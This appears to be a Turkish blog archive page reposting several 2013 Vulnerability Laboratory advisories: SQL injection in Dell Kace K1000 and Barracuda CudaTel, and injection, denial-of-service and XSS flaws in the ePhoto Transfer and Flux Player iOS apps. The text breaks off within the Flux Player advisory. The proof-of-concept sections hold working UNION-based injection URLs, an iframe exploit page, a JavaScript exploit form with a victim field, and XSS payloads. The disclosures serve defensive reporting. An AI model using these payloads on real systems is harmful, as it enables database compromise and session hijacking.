Archive for 23 Temmuz 2013

Dell Kace 1000 SMA 5.4.742 – SQL Injection Vulnerabilities

Dell Kace 1000 SMA 5.4.742 – SQL Injection Vulnerabilities

Title:
======
Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities


Date:
=====
2013-07-22


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=832


VL-ID:
=====
832


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, 
while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. 

The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that 
can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent 
appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides 
direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end 
point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software 
only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an 
Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. 

(Copy of the Vendor Homepage:  http://www.kace.com/products/systems-management-appliance )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerabilities in Dell Kace K1000, Systems Management Appliance.


Report-Timeline:
================
2013-01-24:     Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-02-06:     Vendor Notification (Dell Security Team)
2013-02-08:     Vendor Response/Feedback  (Dell Security Team)
2013-**-**:     Vendor Fix/Patch (Dell Security Team)
2013-07-22:     Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
DELL
Product: Kace K1000 SMA 5.4.70402


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
Multiple SQL Injection vulnerabilities are detected in the Dell Kace K1000, Systems Management Appliance Application.
A SQL Injection vulnerability allows an attacker (remote) to execute/inject SQL commands in the affected application dbms. 

The sql injection vulnerabilities are located in the history_log.php, service.php, software.php, settings_network_scan.php, 
asset.php, asset_type.php, metering.php and mi.php files. All files are located in the adminui. A remote attacker is able 
to inject own sql commands when processing to request the vulnerable TYPE_ID and ID parameters.

Exploitation of the sql injection vulnerabilities requires no or a low privilege application user account and no user interaction. 
Successful exploitation of the vulnerability results in database management system & application compromise via remote sql injection attack. 


Vulnerable Module(s):
					[+] adminui

Vulnerable File(s):
					[+] history_log.php
					[+] service.php
					[+] software.php
					[+] settings_network_scan.php
					[+] asset.php
					[+] asset_type.php
					[+] metering.php
					[+] mi.php
					[+] replshare.php
					[+] kbot.php

Vulnerable Parameter(s):
					[+] TYPE_ID
					[+] ID


Proof of Concept:
=================
The SQL injection vulnerabilities can be exploited by remote attackers without privileged application user account and without required user interaction. 
For demonstration or reproduce ...

1.1
PoC:
https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-

1.2
PoC:
https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-

1.3
 https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]--

Exploit:

<html>
<head><body><title>Download</title>
<iframe src=https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,
6,version%28%29,8,9,10,11,12--%20- width="600" height"600"><br><iframe src=https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+
union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20- width="600" height"600"><br><iframe src=
https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]-- width="600" height"600"><br>
</body></head>
</html>

 --- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/software.php on line 95: 
mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the right syntax to use near ''1291''' at line 1] in EXECUTE("select OS_ID from SOFTWARE_OS_JT where SOFTWARE_ID = '1291''")
 
1.4
PoC: 
https://pub37.137.0.0.1:8080/adminui/settings_network_scan.php?ID=2+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/settings_network_scan.php on line 54: 
 mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 1] 
 in EXECUTE("select * from SCAN_SETTINGS where ID = 2'")
 
1.5
PoC: 
https://pub37.137.0.0.1:8080/adminui/asset.php?ID=2+[SQL-INJECTION!]--%20-
 
--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/Asset.class.php on line 61: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 3] 
in EXECUTE("select *, DATE_FORMAT(CREATED,'%b %d %Y %I:%i:%s %p') as CREATED,
DATE_FORMAT(MODIFIED,'%b %d %Y %I:%i:%s %p') as MODIFIED
from ASSET where ID = 2'")

1.6
PoC:
https://pub37.137.0.0.1:8080/adminui/asset_type.php?ID=5+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/AssetType.class.php on line 62: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''5''' at line 1] 
in EXECUTE("select * from ASSET_TYPE where ID = '5''")

1.7
PoC: 
https://pub37.137.0.0.1:8080/adminui/metering.php?ID=11+[SQL-INJECTION!]--%20-&MONTHS=1

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/metering.php on line 65: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select LABEL_ID from FS_LABEL_JT
where FS_ID =11'") 

1.8
PoC: 
https://pub37.137.0.0.1:8080/adminui/mi.php?ID=5

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/mi.php on line 350: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near 'hidden')))' at line 4] 
in EXECUTE("select ID,NAME from MACHINE
WHERE ID in ( Select MACHINE_ID from MACHINE_LABEL_JT
where LABEL_ID in ( Select LABEL_ID from MI_LABEL_JT
where MI_ID = '5'' and LABEL_ID in
(select ID from LABEL where TYPE='hidden')))")

1.9
PoC: 
https://pub37.137.0.0.1:8080/adminui/replshare.php?ID=1+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/include/ReplShare.class.php on line 20: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select * from REPLICATION_SHARE where ID=1'")

1.10
PoC: 
https://pub37.137.0.0.1:8080/adminui/kbot.php?ID=20+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/KBot.class.php on line 183: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''20''' at line 15] 
in EXECUTE("select k.*, DATE_FORMAT(k.CREATED,'%b %d %Y %I:%i:%s %p'), DATE_FORMAT(k.MODIFIED,'%b %d %Y %I:%i:%s %p'),
unix_timestamp(k.MODIFIED) as MODIFIED_TMSTAMP,
unix_timestamp(k.CREATED) as CREATED_TMSTAMP,
f.ID as FORM_ID, f.FORM_URL, f.FORM_NAME,
s.SCRIPT_TEXT, s.FILE_NAME, s.CHECKSUM, s.TIMEOUT,
s.REMOVE_FILES, s.UPLOAD_FILE, s.UPLOAD_FILE_PATH, s.UPLOAD_FILE_NAME,
k.RUN_AS_USR, k.RUN_AS_PASS_ENC,
k.ALERT_ENABLED, k.ALERT_DIALOG_OPTIONS,
k.ALERT_DIALOG_TIMEOUT, k.ALERT_DIALOG_TIMEOUT_ACTION, k.ALERT_SNOOZE_DURATION, k.ALERT_MESSAGE
from KBOT k
left join KBOT_FORM f
on k.ID = f.KBOT_ID
left join KBOT_SHELL_SCRIPT s
on k.ID = s.KBOT_ID
where k.ID = '20''")


Risk:
=====
The security risk of the remote sql injection web vulnerabilities are estimated as critical.


Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) ibrahim@evolution-sec.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Barracuda CudaTel 2.6.02.040 – Remote SQL Injection Vulnerability

Barracuda CudaTel 2.6.02.040 – Remote SQL Injection Vulnerability
açığı ile ilgili olarak açığın oluşum yerleri hakkında açıklamalar şu şekilde;

Title:
======
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability


Date:
=====
2013-07-20


References:
===========
http://vulnerability-lab.com/get_content.php?id=775

BARRACUDA NETWORK SECURITY ID: BNSEC-723


VL-ID:
=====
775


Common Vulnerability Scoring System:
====================================
8.6


Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=========
1.1
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

1.2
The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:
================
2012-11-26:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-27:	Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-12-01:	Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-03-01:	Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow]
2013-07-20:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application.
The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) 
own SQL commands to the affected application dbms. 

The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row & page 
parameters as searchstring. A remote attacker can for example delete the standard value context of the module request 
to inject (execute) own sql commands. 

Eploitation of the vulnerability requires a low privilege web application user account and no user interaction.
Successful exploitation of the vulnerability results in datbase management system and web application compromise.

Vulnerable Section(s)
				[+] search - listing

Vulnerable Module(s)
				[+] cdr - seachstring listing

Vulnerable Parameter(s)
				[+] &row
				[+] &page



1.2
A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application.
The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser.

The secound vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the 
exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output.
To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to 
execute own malicious (client-side) script code.

Exploitation of the vulnerability requires a no web application user account but medium or high user interaction.
Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side 
external redirects to malware or malicious websites. Exploitation requires medium user interaction.

Vulnerable Section(s):
				[+] search - listing

Vulnerable Module(s):
				[+] cdr - seachstring listing

Vulnerable Parameter(s):
				[+] &row

Affected Module(s):
				[+] Exception-Handling (invalid value)


Proof of Concept:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc

Standard Request: Output
--- 1.
{"count":0,"page":"1","cdr":[],"rows":"100"}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

<html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Download</title>
<script language="JavaScript">
var path="/gui/cdr/cdr"
var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows="
var domain ="http://cudatel.127.0.0.1:1337"
var sql = "'1+1%27[SQL-Injection!]%27--"  
function command(){
if (document.rfi.target1.value==""){
alert("NOPE!");
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#000000" link="#990000">
<center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) 
- Remote SQL-Injection Exploit</font>
</b></p><form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left">
<p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b>
<input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p>
<p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080">  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div>
<p align="left"><input type="submit" value="Execute INPUT" name="B1">
</p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left">
  <p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:research@vulnerability-lab.com">
BKM</a></font></b></p></div></center></body></html>


1.2
The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction.
For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc

Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception.


Solution:
=========
1.1
To patch the sql injection it is required to parse the row and page parameters in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input.
Encode the affected exception-handling output listing when processing to display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area.


Risk:
=====
1.1
The security risk of the remote sql injection web vulnerability  is estimated critical.

1.2
The security risk of the client side input validation web vulnerability is estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

ePhoto Transfer v1.2.1 iOS – Multiple Web Vulnerabilities

ePhoto Transfer v1.2.1 iOS – Versiyonunda çeşitli açıklar bulunmuş olup, bulunan açık hakkında açık bulucunun açıklamaları ve yorumları aşağıdaki gibidir.

Title:
======
ePhoto Transfer v1.2.1 iOS - Multiple Web Vulnerabilities


Date:
=====
2013-07-17


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1017


VL-ID:
=====
1017


Common Vulnerability Scoring System:
====================================
6.6


Introduction:
=============
ePhoto Transfer lets you quickly transfer photos and videos between your iPhone, iPad, iPod Touch, Mac, PC, and 
even other non-iOS mobile devices via Wi-Fi. It turns your iPhone/iPad/iPod Touch into a USB drive from your PC 
or Mac, then all your photos and videos will be available for drag and drop. You don`t need to install any desktop 
software(even iTunes), so you can use it at home or in office. It also provides useful features to help you organize 
your photos. You can rename photos and videos, sort and search within your camera roll. You can choose which photos 
and videos to share, and set accessing password for the shared files. Transferring photos and videos over Personal 
Hotspot Wi-Fi is fully supported. It`s a universal app, download once, both your iPhone and iPad will have it. 

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/ephoto-transfer/id643118163 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the ePhoto Transfer v1.2.1 application (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-07-17:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: ePhoto Transfer 1.2.1


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A local command/path injection web vulnerability is detected in the ePhoto Transfer v1.2.1 application (Apple iOS - iPad & iPhone).
The vulnerability allows local attackers to inject commands or path request on application -side of the vulnerable module.

The vulnerability is located in the Index File Dir Listing module when processing to display manipulated Photo Picture Folder Names.
Local attackers with physical device access can inject script code to the regular iOs photo application by renameing the visible folders.
The attacker can save the changed foldername and to execute when accessing the index file dir listing module.

Exploitation of the command injection web vulnerability does not require a privilege application user account or user interaction. 
Successful exploitation results in application-side command/path injection to unauthorized access files or to compromise the application 
or mobile device.

Vulnerable Module(s):
				[+] File Dir Index

Vulnerable Parameter(s):
				[+] Photo Album Name > FolderName


1.2
A remote denial of servicce vulnerability is detected in the ePhoto Transfer v1.2.1 application (Apple iOS - iPad & iPhone).
The denial of service vulnerability allows a remote attacker to crash, slow down, block or shutdown the mobile application core.

The vulnerability is located in the upload parameter when processing to request negative large integer values as filename.
The attacker can open the url deletes the name of an exisiting file and includes a large negative integer value. As reaction 
because of the unfiltered input the application crashs. 

Exploitation of the denial of service vulnerability does not require a privilege application user account or user interaction.
Successful exploitation of the vulnerability result in a stable application crash or shutdown.

Vulnerable Module(s):
				[+] Upload Files

Vulnerable Parameter(s):
				[+] upload




1.3
A client side cross site scripting vulnerability is detected in the ePhoto Transfer v1.2.1 application (Apple iOS - iPad & iPhone).
The input validation vulnerability allows remote attackers to manipulate browser requests by client side script code injects in the web application. 

The vulnerability is located in the file download module when processing to request a manipulated download parameter via GET method.
The script code will be executed when the service is redirecting user to the file dir menu listing.

Exploitation of the vulnerability does not require a privilege application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent malicious external redirect 
and persistent module context manipulation.

Vulnerable Module(s):
				[+] Files Download

Vulnerable Parameter(s):
				[+] download 


Proof of Concept:
=================
1.1 - Local Command/Path Injection Vulnerability
The local command/path inject web vulnerability can be exploited by remote attackers with physical device access and without user interaction. 
For demonstration or reproduce ...

PoC: Index Listing - Foldername
<tbody xmlns="http://www.w3.org/1999/xhtml"><tr><td class="icon"><a href="..">
<img src="/static/backToParent_icon.png"/></a></td><td class="name"><a href="..">Parent Directory</a></td>
<td class="modifieddate"/><td class="size"/><td/></tr><tr><td class="icon"><a><img src="/static/GenericFolderIcon.png"/></a></td>
<td class="name"><a href="/Photos/Misc Backgrounds">Misc Backgrounds</a></td><td class="modifieddate">2013-07-16 19:05</td>
<td class="size">--</td><td class="download"/></tr><tr><td class="icon"><a><img src="/static/GenericFolderIcon.png"/></a></td>
<td class="name">
<a href="/Photos/Sky Lounge>"<>"%20> "<iframe src=a>">Sky Lounge>"<>"%20> "<iframe src=a></a></td>
<td class="modifieddate">2013-07-16 19:05</td><td class="size">
--</td><td class="download"></td></tr><tr><td class="icon"><a><img src="/static/GenericFolderIcon.png"/></a></td><td class="name"><a 

href="/Photos/Aufnahmen">Aufnahmen</a></td><td class="modifieddate">2013-07-16 19:05</td><td class="size">--
</td><td class="download"/></tr></tbody>

Note: The foldername can be changed in the Photo App of iOS. The execution of the command or path request will be in the main index file dir listing.


1.2 - Denial of Service
The remote denial of service vulnerability can be exploited by remote attackers without privilege application user account and also 
without user interaction. For demonstration or reproduce ...


http://localhost:8080/Photos/Misc%20Backgrounds?upload=-99999999

Note: After opening the upload parameter with negative large integer value the service will crash because of a memory corruption.


1.3 - Client Side Cross Site Scripting
The client site cross site scripting web vulnerability can be exploited by remote attackers without application user account and low or 
medium user interaction. For demonstration or reproduce ...

PoC: 
http://localhost:8080/PermissionNotes(PleaseRead).pdf?download=1&download=2+<iframe src=http://www.vuln-lab.com>

Note: To execute the client side script code an existing file is required to request the download parameter.
The pdf file mentioned in the poc is a default file and ever available after the installation of the iOS app.


Solution:
=========
1.1
The first vulnerability can be patched by a secure encoding of the picture and photo folder names.

1.2
The denial of service can be patched by a secure restriction and encode of the upload parameter. 

1.3
The client side cross site scripting web vulnerability can be fixed by encoding of the download parameter when processing to list files.


Risk:
=====
1.1
The security risk of the command injection web vulnerability is estimated as high(-).

1.2
The security risk of the remote denial of service web vulnerability is estimated as medium.

1.3
The security risk of the client side cross site scripting vulnerability is estimated as low(+)|(-)medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


Flux Player v3.1.0 iOS – Multiple Vulnerabilities

Flux Player v3.1.0 iOS -Versiyonlarında file include ve upload açıkları bulunmuş olup, açığın oluşum yerleri hakkında yorumlar aşağıdaki şekildedir.

Title:
======
Flux Player v3.1.0 iOS - File Include & Arbitrary File Upload Vulnerability



Date:
=====
2013-07-16


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1013


VL-ID:
=====
1013


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
With `Flux Player` you can use your iPhone, iPad or iPod touch for download, transfer and playback of movies, 
audio books and music. The movies may be from transferred from commercial services, products or alternatively 
from yourself by drag-and-drop with the free `Flux Transfer` PC application.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/flux-player/id324300572 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a file include & arbitrary file upload vulnerability in the Flux Player 3.1.0 (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-07-16:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Flux Player - Application 3.1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A file include web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad & iPhone).
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when processing to upload files with manipulated names via POST method. The attacker can inject 
local path or files to request context and compromise the device. The validation has a bad side effect which impacts the risk to combine the attack 
with persistent injected script code.

Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized local file and path requests to compromise the device or application.

Vulnerable Module(s):
				[+] Upload (Files)

Vulnerable Parameter(s):
				[+] filename 

